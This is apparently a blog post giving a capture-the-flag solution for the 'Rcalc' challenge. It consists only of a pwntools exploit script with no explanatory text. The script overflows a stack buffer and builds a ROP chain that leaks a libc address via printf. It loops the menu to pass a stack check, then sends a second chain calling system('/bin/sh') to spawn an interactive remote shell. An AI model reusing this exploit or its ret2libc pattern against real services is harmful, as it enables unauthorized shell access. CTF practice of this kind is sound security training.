My blog
0%

adworld-Rcalc

发表于 更新于 分类于

ROP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
from pwn import *
context.log_level='debug'   
context.terminal = ['tmux','splitw','-h']
#context.update(arch='i386')
#cn = process(["/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11_amd64/ld-2.23.so","./Rcalc"],env={"LD_PRELOAD":"/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11_amd64/libc.so.6"})
#cn = process(["/glibc/2.23/64/lib/ld-2.23.so","./Rcalc"],env={"LD_PRELOAD":"/glibc/2.23/64/lib/libc.so.6"})
cn = remote('10.10.31.156',10002)
elf = ELF('./Rcalc')
#libc = ELF('/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11_amd64/libc.so.6')
#libc = ELF('./x64_libc.so.6')
libc = ELF('./libc6_2.23-0ubuntu11.2_amd64.so')
#libc = ELF('./libc.so.6')
libc_start_main_got = elf.got['__libc_start_main']
#main = 0x400FA2
printf_plt = elf.plt['printf']
main = 0x401036
pop_rdi = 0x401123
fmt_str = 0x401203
pop_rsi_r15_ret = 0x401121
#bin_sh_offset = 0x000000000018c177
#bin_sh_offset = 0x000000000018c17c
bin_sh_offset = next(libc.search(b"/bin/sh"))
read_got = elf.got['read']
cn.recvuntil('I')
#gdb.attach(cn,gdbscript='''b *0x400f89''')
#gdb.attach(cn,gdbscript='''b *0x401022''')
#gdb.attach(cn,gdbscript='''b *0x400f8e''')
print(main)
print(libc_start_main_got)
payload = flat(['a'*0x108,p64(0),p64(0),p64(pop_rdi),p64(fmt_str),p64(pop_rsi_r15_ret),p64(libc_start_main_got),p64(0),p64(printf_plt),p64(main)])
print(payload)
cn.sendlineafter('pls: ',payload)
for i in range(35):
    cn.sendlineafter('choice:','1')
    cn.sendlineafter('integer: ','0')
    cn.sendlines('0')
    cn.sendlineafter('result? ','yes')
 
cn.sendlineafter('Your choice:','5')
libc_start_main = cn.recv(8)
libc_base = u64(libc_start_main.ljust(8,b'\x00')) - libc.symbols['__libc_start_main']
libc_system = libc_base + libc.symbols['system']
bin_sh_addr = libc_base + bin_sh_offset
payload = flat(['a'*0x108,p64(0),p64(0),p64(pop_rdi),p64(bin_sh_addr),p64(libc_system)])
cn.sendlineafter('pls: ',payload)
for i in range(35):
    cn.sendlineafter('choice:','1')
    cn.sendlineafter('integer: ','0')
    cn.sendlines('0')
    cn.sendlineafter('result? ','yes')
 
cn.sendlineafter('Your choice:','5')
print(hex(libc_base))
print(hex(u64(libc_start_main.rjust(8,b'\x00'))))
print(hex(bin_sh_addr))
print(hex(libc_system))
print(hex(bin_sh_addr))
 
#cn.sendline(payload)
#read_addr=cn.recv(4)
cn.interactive()